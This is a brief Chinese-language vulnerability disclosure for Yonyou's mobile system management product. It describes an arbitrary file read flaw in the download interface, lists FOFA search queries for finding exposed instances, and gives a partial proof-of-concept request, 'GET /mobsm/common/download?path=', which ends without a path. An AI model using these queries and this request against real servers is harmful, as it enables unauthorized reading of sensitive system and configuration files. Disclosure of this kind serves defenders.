产品简介
用友移动系统管理时用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。
漏洞概述
用友移动管理系 download接口存在一个任意文件读取漏洞,攻击者可通过构造静心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。利用此漏洞,攻击者能获得系统内的敏感信息,导致潜在的信息泄露风险。
复现环境
fofa语句
app="用友-移动系统管理" || 'title="Login" && body="移动系统管理"' || body="../js/jslib/jquery.blockUI.js"
漏洞复现
Poc
GET /mobsm/common/download?path=